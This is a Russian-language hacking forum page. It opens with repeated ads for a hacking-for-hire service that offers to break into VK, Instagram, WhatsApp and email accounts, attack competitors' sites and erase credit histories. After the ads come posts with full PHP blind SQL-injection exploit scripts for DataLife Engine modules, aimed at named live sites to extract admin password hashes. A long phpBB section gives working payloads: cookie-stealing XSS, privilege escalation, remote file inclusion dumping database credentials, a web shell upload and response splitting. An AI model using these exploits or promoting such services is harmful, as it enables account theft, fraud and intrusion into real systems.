2) Выполняем срочные заказы
3) Заключаем сделки только через проверенный и надежный гарант сервис
4) Гарантируем анонимность и конфиденциальность каждому клиенту
5) Имеем свои профессиональные методы и приемы при выполнении заказов
6) Гарантируем качество работы
7) Даем консультации каждому клиенту и предоставляем подробную инструкцию по использованию определенных приложений

Получить всё это вы можете, обратившись по адресу Acount.attack.hakker@gmail.com!

--------------------------------------------------------------------------------------------------------



















-------------------------------------Acount.attack.hakkerСОБАКАgmail.com-------------------------------------

                          Вы получите от нашего сервиса следующие услуги взлома на заказ:
 
- Быстрое выполнение заказа
- Качество работы доставит вам удовольствие
- Гарантируем конфиденциальность каждому клиенту


vk и ok
  Что вы получите от нашего сервиса, заказывая взлом вконтакте или одноклассники:
- Пароль и логин для входа без изменения (в единственном случае можем изменить, если об этом просит клиент)
- Повторный взлом бесплатно, если жертва поменяет пароль в течении месяца
- Доказательства - на ваш выбор
- Анонимность и качественное выполнение заказа
- Даем всю необходимую информацию для безопасного входа на страницу жертвы


Выполним для вас взлом: Instagram, Twitter, ICQ, Skype, Viber, Whatsapp (что не нашли - уточняйте)

Взломаем САЙТ конкурентов, удалим негативные ОТЗЫВЫ (фото, видео и не только), осуществляем взлом EMAIL

Если вам необходимо удалить отрицательную Кредитную Историю - это снова к Acount.attack.hakkerСОБАКАgmail.com. Мы можем почистить вашу БКИ, а также повысить скоринговый балл



║║ ─ ╔╗ ─ ║╔ ─ ╔═ ─ ╔╗
╠╣ ─ ╠╣ ─ ╠╣ ─ ╠═ ─ ╠╝
║║ ─ ║║ ─ ║╚ ─ ╚═ ─ ╠╗






Почему именно у Acount.attack.hakkerСОБАКАgmail.com стоит заказать взлом?
1) В нашем сервисе работают только профессионалы, которые сделают работу в срок
2) Выполняем срочные заказы
3) Заключаем сделки только через проверенный и надежный гарант сервис
4) Гарантируем анонимность и конфиденциальность каждому клиенту
5) Имеем свои профессиональные методы и приемы при выполнении заказов
6) Гарантируем качество работы
7) Даем консультации каждому клиенту и предоставляем подробную инструкцию по использованию определенных приложений

Получить всё это вы можете, обратившись по адресу Acount.attack.hakkerСОБАКАgmail.com!

--------------------------------------------------------------------------------------------------------




#233 Уязвимости DataLife Engine

Написано Admin : 28 Февраль 2016 - 08:11

SQL-inj в неофициальном модуле files (файловый архив)
уязвимость после order by в параметре orderby
Пример запроса:
http://www.site.ru/index.php?do=files&op=cat&id=1&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+0,1),1,1))+between+0+and+0,url,[b](select%201%20from%20dle_downloads))+--+
 
Эксплоит:[/b]
 
<?phpset_time_limit(0);/*-----------------------------------------------------*/ //Эксплойт для модуля Files(модуль файлового архива) к DLE//Автор: H00K/*-----------------------------------------------------*/  /*-----------------Настройки---------------------------*/ $host="symbiware.org";//указываем хост$catid = "38";//Указываем id существующей категории$userid = "0";//Указываем id администратора/*-----------------------------------------------------*/  $good = "MySQL Fatal Error";$bad = "Архив файлов";$path="/index.php?do=files&op=cat&id={$catid}&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+{$userid},1),";$end = ",(select%201%20from%20dle_downloads),url)+--+";$index = 1;$result = ""; function GetMiddle($min, $max){ return floor($min+((($max+1)-($min-1))/2));} function Check($min,$max){ if (($max-$min)<=2)  {  global $index;  global $result;  global $host;  global $path;  echo "Символ найден: ";  if (($max-$min)==1)  if (CheckSQL($host, $path, $index.",1))={$max}"))    $result .=chr($max); else $result .=chr($min);  if (($max-$min)==2)  {  if (CheckSQL($host, $path, $index.",1))={$max}"))  {    $result .=chr($max);  } else  {   if(CheckSQL($host, $path, $index.",1))={$max}-1"))    $result .=chr($max-1); else $result .=chr($min);    }  }   echo substr($result,strlen($result)-1)."<br>";   flush();   $index++;    return true;  } else return false;} function CheckSQL ($host, $path, $st){   global $end;    $line="";    $fo = fsockopen($host, 80, $errno, $errstr, 30);    if(!$fo){die ("no connect");}    else     {        $headers="GET ".$path.$st.$end." HTTP/1.1rn";       $headers.="Host: ".$host."rn";       $headers.="Connection: Closernrn";           global $good;       global $bad;        fwrite($fo, $headers);        while (!feof($fo))        {            $line = fgets($fo, 512);            if (strpos($line,$good))             {             fclose($fo);             return true;            }            if (strpos($line,$bad))            {             fclose($fo);             return false;            }        }        fclose($fo);    }    return false;}if (CheckSQL($host, $path, $index.",1))+between+1+and+255"))  echo (" Идет подбор символов...<br>"); else  die("Ошибка"); for ($i=0;$i<32;$i++){ $min = 31; $max = 123; $ok = true; while ($ok == true) {  $num = GetMiddle($min,$max);  if (!check($min,$max))  {  if (CheckSQL($host, $path, $index.",1))+between+1+and+{$num}"))   { echo("Меньше $num <br>");   $max = $num;  } else  {  echo ("Больше $num <br>");    $min = $num;  }   flush(); } else $ok = false; } }echo $result;?>
 
SQL-inj в неофициальном модуле gallery, в параметре news_sort
Уязв.код (news_sort) :show_cat.php
 
if ( isset($_POST['news_sort']) ) $galConfig['news_sort'] = mysql_escape_string($_POST['news_sort']); elseif ($gal_cat[$category_id]['news_sort'] != "") $galConfig['news_sort'] = $gal_cat[$category_id]['news_sort'];if ( isset($_POST['news_msort']) ) $galConfig['news_msort'] = mysql_escape_string($_POST['news_msort']); elseif ($gal_cat[$category_id]['news_msort'] != "") $galConfig['news_msort'] = $gal_cat[$category_id]['news_msort']; if ($galConfig['user_cats_limit']) $sear = "(" . PREFIX . "_gal_cat.cat_status = '0' OR " . PREFIX . "_gal_cat.cat_status = '2') AND " . PREFIX . "_gal_pic.approve='1'"; else $sear = "" . PREFIX . "_gal_cat.cat_status = '0' AND " . PREFIX . "_gal_pic.approve='1'"; $result = $db->query("SELECT " . PREFIX . "_gal_pic.*, " . PREFIX . "_gal_cat.cat_title, cat_alt_name, allow_rating, allow_comm FROM " . PREFIX . "_gal_pic LEFT JOIN " . PREFIX . "_gal_cat ON " . PREFIX . "_gal_pic.pic_cat_id=" . PREFIX . "_gal_cat.cat_id WHERE " . PREFIX . "_gal_cat.cat_alt_name='$category' AND $sear AND " . PREFIX . "_gal_cat.cat_view_level regexp '[[:<:]]($member_id[user_group])[[:>:]]' ORDER BY ".$galConfig['news_sort']." ".$galConfig['news_msort']." LIMIT $cstart, $lim");
Как видим данные из news_sort попадают в функцию mysql_escape_string, но так как в запросе данные не обрамляются кавычками, эта функция никаким образом не помешает проведению sql инъекции
 
Пример запроса:
 
POST /index.php?do=gallery&action=show_cat&category=gorod HTTP/1.1Host: www.simfilife.netUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127Keep-Alive: 300Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 133news_sort=if(ord(substring((select password from dle_users where user_id=1),1,1))>4,(select 1 from dle_usergroups),0)&news_msort=DESC
Exploit:
<?php set_time_limit(0); /*-----------------------------------------------------*/ //Эксплойт для неофициального модуля Gallery для DLE//Автор: l-l00K/*-----------------------------------------------------*/   /*-----------------Настройки---------------------------*/   $good = "MySQL Fatal Error"; $bad = "robots"; $host= "simfilife.net";//указываем сайт $path="/index.php?do=gallery&action=show_cat&category=gorod";//Указываем существующую категорию $body = "news_sort=if(ord(substring((select password from dle_users where user_id=1),"; $index = 1; $result = ""; $end = ",(select 1 from dle_usergroups),0)&news_msort=DESC";  function GetMiddle($min, $max) {  return floor($min+((($max+1)-($min-1))/2)); }  function post_sql($host,$path,$post_body) { global $end; $post_body  .= $end; $post_query  = "POST ".$path." HTTP/1.1rn"; $post_query .= "Host: ".$host."rn"; $post_query .= "Connection: closern"; $post_query .= "Content-Type: application/x-www-form-urlencodedrn"; $post_query .= "Content-length: " . strlen($post_body) . "rnrn"; $post_query .= $post_body;  $sock = fsockopen($host, 80, $errno, $errstr, 30);  if (!$sock) die('Could not connect to host! ');  fputs($sock, $post_query); global $good; global $bad; $answer = ''; while (!feof($sock)) {    $answer .= fgets($sock, 1024);    if (strpos($answer,$good))     {     fclose($sock);     return true;    }    if (strpos($answer,$bad))    {      fclose($sock);      return false;    } } fclose($sock); return false;} function Check($min,$max){ if (($max-$min)<=2)  {  global $index;  global $result;  global $host;  global $path;  global $body;  echo "Символ найден: ";  if (($max-$min)==1)  if (post_sql($host, $path, $body.$index.",1))={$max}"))    $result .=chr($max); else $result .=chr($min);  if (($max-$min)==2)  {  if (post_sql($host, $path, $body.$index.",1))>{$max}-1"))  {    $result .=chr($max);  } else  {   if(post_sql($host, $path, $body.$index.",1))={$max}-1"))    $result .=chr($max-1); else $result .=chr($min);    }  }   echo substr($result,strlen($result)-1)."<br>";   flush();   $index++;    return true;  } else return false;} $bool = true;while ($bool==true){ if (post_sql($host, $path, $body.$index.",1))>0"))  {  echo ("Символ есть, идет подбор...<br>");  flush();  $ok = true; } else  { echo ("Символы кончились <br>");  $ok = false;  $bool = false;  echo $result; } $min = 31; $max = 123; while ($ok == true) {  $num = GetMiddle($min,$max);  if (!check($min,$max))  {  if (post_sql($host, $path, $body.$index.",1))<{$num}"))   {   echo("Меньше $num <br>");   $max = $num;  } else  {   echo ("Больше $num <br>");    $min = $num;  }   flush(); } else $ok = false; } } ?>



#13 Все о phpBB x.xx, Уязвимости.

Написано Admin : 23 Ноябрь 2015 - 11:10

1.4.2 version: 
--
Cross Site Scripting:
Cross Site Scripting позволяет нападающим вставлять JavaScript код (и другой код HTML) в существующие сообщения. 
Пример:
{img}javascript:alert('This is the test'){/img}
--
 
1.4.4 version:
--
DoS и нарушение структуры базы данных:
Уязвимость существует в выполнении phpBB's BBcode ({code}{/code},{quote}{/quote},{list}{/list}).
Добавление строки ‘0000000’ внутри одного из этих тэгов, приведет к 100% потреблению ресурсов памяти и процессора на уязвимом сервере и к нарушении структуры базы данных.
Пример: 
1. {code}'0'*800{/code} 
2. {code}0{code}0{code}0{/code}0{/code}0{/code}
--
 
2.0.0 version:
--
Межсайтовый скриптинг: 
Уязвимость защиты в программе позволяет удаленным нападающим вставлять злонамеренный HTML и JavaScript код в существующие web-страницы внутри тэга IMG специальной конструкции:
 
{img}http://a.a/a"onerror="javascript:alert(document.cookie){/img}
--
Повышение привилегий:
Уязвимость позволяет пользователю с учетной записью "user" поднять свои привилегии до уровня "administrator", тем самым получая полный контроль над управлением форума. 
 
Ошибка присутствует в сценарии admin_ug_auth.php (используется для установления разрешения). Для просмотра защищенных страниц сценарий способен ограничить доступ непривилегированным пользователям, но он не производит такую проверку при отправлении назад данных. Демонстрационный код:
<html><head></head><body> <form method="post" action="http://domain_name/board_directory/admin/admin_ug_auth.php">User Level: <select name="userlevel"><option value="admin">Administrator</option><option value="user">User</option></select><input type="hidden" name="private[1]" value="0"><input type="hidden" name="moderator[1]" value="0"><input type="hidden" name="mode" value="user"><input type="hidden" name="adv" value="">User Number: <input type="text" name="u" size="5"><input type="submit" name="submit" value="Submit"> </form></body></html>
Далее отредактируйте действие формы в этом коде, измените местоположение admin сценария. Обычно, он находится в подкаталоге /admin/. Затем вызовите код в локальном окне браузера, и введите номер неадминистративного пользователя. Нажмите submit. При следующем заходе, вы получите права администратора.
--
 
2.0.2 version:
--
Административный доступ:
Обнаружена возможность изменения SQL запроса. Удаленный пользователь может получить хеш пароля администратора и, используя его, получить полный контроль над PHPbb системой. 
 
Уязвимость обнаружена в сценарии page_header.php.
Например, чтобы взломать user_id '40', запросите следующую страницу: 
 
forum_id=1+or+user_id=40+and+mid(user_password,1,1 )=char(97)/*[
 
В результате запрос будет выглядеть следующим образом: 
 
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level, 
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s WHERE 
u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND s.session_page = 
1 or user_id=40 and mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC, 
s.session_ip ASC
 
Имя администратора системы можно просмотреть вверху списка пользователей внизу страницы форума. Далее добавляя хеш пароля в куки, можно войти на сайт как администратор системы. Например, если user_id равен 32360, и хеш пароля - 6a204bd89f3c8348afd5c77c717a097a, то атакующий должен добавить следующее значение: 
a:2:{s:11:"autologinid";s:32:"
6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:5 :"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
Затем urlencode() это и поместите в куки с переменной 'phpbb2support_data', затем обратитесь к административной странице на phpbb сайте. Демонстрационный эксплоит: 
 
http://{target}/phpBB/prefs.php?HTTP_POST_VARS{save}
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0& smile=0&dishtml=0&disbbcode=0&themes =1?=/../../../var/logs/apache/access.log%00&save=1&user=admin&submit=Save%20Pref erences
--
2.0.3 version:
--
Выполнение произвольного PHP кода:
Уязвимость позволяет удаленному атакующему внедрить путь к 'extension.inc' в сценарии 'quick_reply.php'. В результате, атакующий может внедрить произвольный PHP сценарий из своего источника, который может использоваться для выполнения произвольных команд на Web сервере. Пример:
Создаем сценарий 'extension.inc' на удаленном сервере:
<?phpinclude('config'.'.php');echo "DB Type: $dbms <br>";echo "DB Host: $dbhost <br>";echo "DB Name: $dbname <br>";echo "DB User: $dbuser <br>";echo "DB Pass: $dbpasswd <br>";exit;?>
Затем запрос:
Раскроет содержание базы данных форума. 
--
Межсайтовый скриптинг:
Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример:
<html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/>  </form> <script> search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script>'; document.search.submit(); </script> </body> </html> 
--
SQL Injection:
phpBB пользователь может посылать приватные сообщения другим пользователям. Обнаруженная уязвимость позволяет пользователю удалить текст всех приватных сообщений, сохраненных в системе.
 
Функция для удаления приватных сообщений уязвима к SQL инъекции. Если мы представляем данные, в которых мы хотим удалить приватное сообщение с номером ‘1) OR 1=1 #’, текст всех сообщений будет удален.
 
Сообщения хранятся в двух таблицах, и SQL инъекция будет воздействовать только на одну из них, так что будут удалены все тела сообщений, а темы и метаданные будут удалены, если они принадлежат текущему пользователю. Это означает, что темы удаленных сообщений все еще можно обнаружить в папках других пользователей. огда пользователь нажимает на такое удаленное сообщение, он будет переадресован назад к папке. 
 
Вы можете эксплуатировать это, отправляя(POST) следующее значение к privmsg.php?folder=inbox*sid = {SID}: 
 
mode=""
delete="true"
mark{}="1) OR 1=1 #"
confirm="Yes"
текущее значение SID можно увидеть в URL полях, если вы вошли в систему с отключенными куки.
--
 
2.0.5 version:
--
Межсайтовый скриптинг:
Удаленный пользователь может выполнить XSS нападение. 
Сообщается, что форум не фильтрует HTML код в переменной topic_id в сценарии viewtopic.php. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта. Пример: 
http://{site}/phpBB/viewtopic.php?topic_id={script}
Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого пользователя.
--
SQl инъекция:
Удаленный пользователь может выполнить нападение SQL инъекции. 
Сценарий 'profile.php' не проверяет переменую 'u'при отображении профиля пользователя. Удаленный пользователь может представить специально сформированный HTTP Get запрос, чтобы выполнить произвольные SQL команды на основной базе данных. 
Пример/Эксплоит: 
http://{target}/profile.php?mode=viewprofile&u='{sqlcode
--
 
2.0.5 version + MySQL 4:
--
SQL инъекция:
Уязвимость в проверке правильности ввода обнаружена в PHPbb. Удаленный пользователь может получить хеши паролей пользователей, включая администратора системы, и затем декодировать их. 
Сообщается, что сценарий viewtopic.php не проверяет данные, представленные пользователем в переменной $topic_id, перед выполнением SQL запроса. Удаленный атакующий может представить специально обработанное значение для этой переменной, чтобы выполнить дополнительный SQL запрос и получить произвольные данные их MySQL базы данных, включая MD5 хеши паролей пользователей форума, включая администратора системы.
 
Exploit: [here!] (2.0.5+MySQL4.perl.txt)
--
 
2.0.6 version:
--
Межсайтовый скриптинг:
Удаленный атакующий может вставить произвольный HTML код в тело сообщения. 
Удаленный атакующий может вставить специально отформатированный BB тэг (bbcode) {url}{/url}, чтобы заставить форум отобразить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. 
Пример/Эксплоит: 
{url=www.somename.ru" onclick=alert('Hello')}text{/url}
{URL=http://www. somename.ru" onclick="alert'Hello'}text{/URL} 
{URL=www. somename.ru" onclick="alert'Hello'}text{/URL}
--
Межсайтовый скриптинг:
Удаленный авторизованный администратор может выполнить XSS нападение против других администраторов форума. 
Удаленный администратор может сконструировать специально обработанную smiley панель таким образом, чтобы выполнить произвольный код сценария в браузере другого администратора, просматривающего эту панель. 
Пример/Эксплоит: Поместите в smiley панель: 
 
<script>alert('Css work')</script>
 
--
SQL иньекция:
Удаленный пользователь может внедрить SQL команды, чтобы получить административный доступ к приложению. 
 
Как сообщается, сценарий 'search.php' не достаточно проверяет параметр 'search_id'. Удаленный пользователь может послать специально обработанное значение, чтобы выполнить произвольные SQL команды на целевом сервере, например, чтобы получить хэши паролей администратора. С хэшами паролей, удаленный пользователь может изменить свои куки, чтобы получить доступ к системе. Воздействие уязвимости зависит от версии используемой базы данных MySQL. 
 
Для определения уязвимости, выполните следующий запрос: 
 
Если ваша система уязвима, то запрос выдаст SQL ошибку: 
 
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that 
corresponds to your MySQL server version for the right syntax to use near ' AND 
session_id = '9c9052fd135c0cefb31ec4b5124060f7'' 
 
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 AND session_id
= '9c9052fd135c0cefb31ec4b5124060f7'
Line : 693
File : /usr/local/www/data/phpBB2/search.php
Эксплоит (боле подробное описание см. в источнике сообщения) (работает только в MySQL 4.x!): 
 
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114 ,99,104,95,114,101,115,117,108,116,
115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58 ,34,116,111,116,97,108,95,109,97,116,
99,104,95,99,111,117,110,116,34,59,105,58,53,59,11 5,58,49,50,58,34,115,112,108,105,116,
95,115,101,97,114,99,104,34,59,97,58,49,58,123,105 ,58,48,59,115,58,51,50,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115, 111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114, 34,59,115,58,52,58,34,68,69,83,67,34,59,
115,58,49,50,58,34,115,104,111,119,95,114,101,115, 117,108,116,115,34,59,115,58,54,58,34,116,111,112
,105,99,115,34,59,115,58,49,50,58,34,114,101,116,1 17,114,110,95,99,104,97,114,115,34,59,
105,58,50,48,48,59,125))%20from%20phpbb_users%20wh ere%20user_id={id}/*
--
SQL инъекция:
Удаленный авторизованный модератор может внедрить произвольные SQL команды. 
 
Сообщается, что функция 'groupcp.php' не проверяет правильность данных, представленных пользователем в $sql_in переменной. Удаленный авторизованный пользователь с 'moderator' привилегиями может представить специально обработанный URL, чтобы выполнить произвольные команды на целевом сервере.
--
Sql инъекция:
Уязвимость обнаружена в phpBB в 'search.php'. Удаленный пользователь может выполнить произвольные SQL команды. 
 
Уязвимость обнаружена в 'search.php' в параметре 'show_results', кода переменная $show_results не установлена к 'posts' или 'topics'.
 
Exploit: [here!] (2.0.6.perl.txt)
--
 
2.0.6c version:
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'viewtopic.php'. Удаленный пользователь может выполнить XSS нападение. 
Уязвимость обнаруженав параметре 'postorder' в сценарии 'viewtopic.php'. Пример: 
 
%22%3E%3C%73%63%72%69%70%74%3E%61
%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6 F%6B%69%65%
--
 
2.0.6d version:
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'viewtopic.php' и 'viewforum.php'. Удаленный пользователь может выполнить XSS нападение. 
viewforum.php?f={FNUM}&topicdays={DNUM}{XSS}
viewforum.php?f=1&topicdays=99"><script>alert(docu ment.cookie)</script>&star t=30
viewtopic.php?t=10&postdays=99"><script>alert(docu ment.cookie)</script>&start=20
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'profile.php'. Удаленный пользователь может выполнить XSS нападение. 
 
Пример/Эксплоит:
-------------exploit.htm--------------<form name='f' action="http://site/profile.php?mode=editprofile" method="post"><input name="avatarselect" value='" ><script>alert(document.cookie)</script>'><input type="submit" name="submitavatar" value="Select avatar"></form><script>window.onload=function(){document.all.submitavatar.click();}</script>---------------end-------------------
2.0.7a version:
--
Sql инъекция:
Удаленный авторизованный администратор может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. 
Пример: 
admin_smilies.php?mode=edit&id=99 UNION SELECT 0,username,0,user_password FROM othersite_phpbb_users WHERE user_id=2
и еще: 
admin_smilies.php?mode=edit&id={SQL}
admin_ smilies.php?mode=delete&id={SQL}
admin_smilies.php?mode=edit&id={XSS}
admin_smilies.php?mode=delete&id={XSS}
admin_styles.php?mode=edit&style_id={SQL}
admin_styles.ph p?mode=delete&style_id={SQL}
admin_styles.php?mode=edit&style_id={XSS}
admin_styles.php?mode=delete&style_id={XSS}
Также сообщается, что множество сценариев не проверяют ID сессии. В результате удаленный пользователь может внедрить phpBB команды в тело сообщения, которые будут выполнены в браузере целевого пользователя, просматривающего сообщение форума.
--
 
2.0.8 version:
--
Sql инъекция:
Уязвимость в проверке правильности входных данных обнаружена в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код. 
 
Пример: 
pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,
user_password,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null ,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/* 
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
--
Раскрытие пути:
 
 
 
 
--
XSS:
in "index.php":
 
{cat_id}=1&category_rows{0}{cat_title}=waraxe<scri pt>alert(document.cookie);</script>&category_rows{0}{cat_order}=99
 
in "languagelang_englishlang_faq.php":
 
http://localhost/phpbb208/faq.php?faq{0}{0...document.cookie );</script>bar&faq{0}{1}=waraxe
 
in "languagelang_englishlang_bbcode.php ":
 
{0}=f00<script>alert(document.cookie);</script>bar&faq{0}{1}=waraxe
--
 
2.0.8а version:
--
Спуфинг IP адресов:
Удаленный пользователь может подделать свой IP адрес, который будет зарегистрирован приложением. 
 
Удаленный пользователь может сконструировать специально обработанный 'X-Forwarded-For' HTTP заголовок, чтобы подменить свой реальный IP адрес произвольным IP адресом. 
 
В результате удаленный пользователь может обойти ограничения доступа к приложению по IP адресу.
--
 
2.0.10 version:
--
Межcайтовый скриптинг и Response Splitting Attacks:
Уязвимость позволяет удаленному пользователю выполнить XSS нападение. 
 
1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример: 
 
search_author=%27%3Cscript%3Ealert(document.cookie )%3C/script%3E
 
Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в 
http://www.sanctumin.....PResponse.pdf). Удаленный пользователь может отравить еш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса: 
 
POST /phpBB2/login.php HTTP/1.0
Host: SERVER
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-Type: application/x-www-form-urlencoded
Content-length: 129
 
logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT
P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!
 
Еще пример: 
GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200
%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha!
HTTP/1.0
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Host: SERVER
--
SQL-инъекция и php инклудинг:
Удаленный атакующий может выполнить произвольный SQL команды и php код на уязвимой системе. 
Уязвимость существует при обработке спецсимволов в строке URL. Удаленный атакующий может выполнить SQL-инъекцию и произвольный php-сценарий на уязвимой системе. Пример:
 
viewtopic.php?t=1&highlight=%2527
 
Exploit: [here!] (2.0.10.perl.txt)
Exploit: [here!] (2.0.10-2.perl.txt)
--
Межсайтовое выполнение сценариев:
Удаленный атакующий может получить доступ к важным данным пользователей.
Уязвимость существует из-за некорректной обработки входных данных переменной 'username'. Удаленный атакующий может создать сообщение, которое при просмотре выполнить произвольный HTML код в браузере жертвы.
--
 
2.0.11 version:
--
Просмотр и удаление произвольных файлов:
Уязвимость форуме позволяет удаленному пользователю раскрыть содержание и удалять (unlink) произвольные файлы на системе с привилегиями Web сервера. 
Уязвимость в phpBB в нескольких сценариях, отвечающих за обработку аватаров (usercp_avatar.php, usercp_viewprofile.php и usercp_register.php) позволяет удаленному пользователю контролировать параметры, переданные функции unlink().
--
 
2.0.12 version:
--
Удаленный административный доступ:
Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме. 
Уязвимость связана с ошибков в сравнении "sessiondata{'autologinid'}" и "auto_login_key". В результате возможно получить административные привилегии на форуме. Логическая уязвимость обнаружена в сценарии includes/sessions.php в следующей строке: 
 
if( $sessiondata{'autologinid'} == $auto_login_key )
Условие выполняется, если длина $sessiondata{'autologinid'}, представленная в куки пользователя, равна длине переменной $auto_login_key. Для исправления уязвимости ее необходимо заменить на строку: 
 
if( $sessiondata{'autologinid'} === $auto_login_key )
Также сообщается об ошибке в "viewtopic.php", которая позволят раскрыть инсталляционный путь.
 
Exploit: [here!] (2.0.12.c.txt)
--
 
2.0.13 version:
--
XSS-атака в сценарии usercp_register.php:
Уязвимость позволяет удаленному пользователю произвести межсайтовый скриптинг и получить доступ к важным данным пользователей.
Уязвимость обнаружена в сценарии 'usercp_register.php' из-за недостаточной обработки входных данных в перемененных 'allowhtml', 'allowbbcode', и 'allowsmilies' в подписи пользователя. Злоумышленник может послать частное сообщение со специально обработанной подписью, чтобы выполнить произвольный HTML сценарий в браузере целевого пользователя.
--
Раскрытие установочной директории:
Уязвимость позволяет злоумышленнику получить информацию об установочной директории приложения на сервере. 
 
Уязвимость существует в сценарии 'phpBB/db/oracle.php'. Удаленный пользователь может непосредственно вызвать уязвимый сценарий и получить информацию об установочной директории приложения на сервере.
--
Получение административных привилегий:
 
Exploit: [here!] (2.0.13-admin.c.txt)
--
Получение хеша паролей:
 
Exploit: [here!] (2.0.13.perl.txt)
--
Загрузка произвольных файлов:
Уязвимость позволяет удаленному пользователю загрузить произвольный файл на сервер.
Уязвимость существует в сценарии up.php из-за некорректной проверки расширений файлов. Удаленный авторизованный пользователь может загрузить произвольный php файл и выполнить его с привилегиями web сервера.
 
Пример Эксплоита:
<?system($cmd)?>
Сохраняем как cmd.php
Открываем http://target/phpbb/up.php
И загружаем наш код.
Его можно увидеть http://targey/phpbb/uploads/cmd.php
Запуская видим:
Warning: system(): Cannot execute a blank command in /home/target/public_html/forum/uploads/tetx.php on line 2
Следовательно мы можем выполнить NIX команды с привеленгиями веб сервера.
--
 
2.0.15 version:
--
Межсайтовый скриптинг в при обработке BBCODE URL:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
 
{url=javascript://%0ASh=alert(%22CouCou%22);window.close();}Alert box with "CouCou"{/url} 
{url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);
Sh.regwrite(%22HKCU%5C%5CQQQQQ
%5C%5Cqq%22,%22CouCou%22);window.close();}Create registry entry: HKCUQQQQQqq = "CouCou"{/url}
 
{url=javascript://%0Awindow.opener.document.body.innerHTML
=window.opener.document.body.innerHTML.replace(%27 Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();}Modify opener page: Paul -> P.A.U.L{/url}
--
Регистрация множества юзеров. Отказ в обслуживание:
 
Exploit: [here!] (2.0.15-DOS.c.txt)
--
Выполнение произвольного PHP сценария в phpBB в коде highlighting: (update time:02.07.05)
Пример:
Позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его. 
 
Exploit: [here!] (2.0.15.perl.txt)
 
2.0.19 version:
--
Раскрытие данных:
Уязвимость существует из-за того, что ID сессии включается в заголовок HTTP "Referer" при отправке запросов внешние аватары или при создании ссылок на внешние сайты. Злоумышленник может заставить администратора просмотреть профиль пользователя, содержащий внешний аватар, и получить ID сессии администратора. Для удачной эксплуатации уязвимости необходимо, чтобы использование внешних аватаров было разрешено на сайте (не является значением по умолчанию). 
Примеры:
 
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
--
XSS:
В admin/admin_smilies.php вы можите изменять / создавать смайлы. Нечего особенного но phpBB не проверят что происходит в БД.
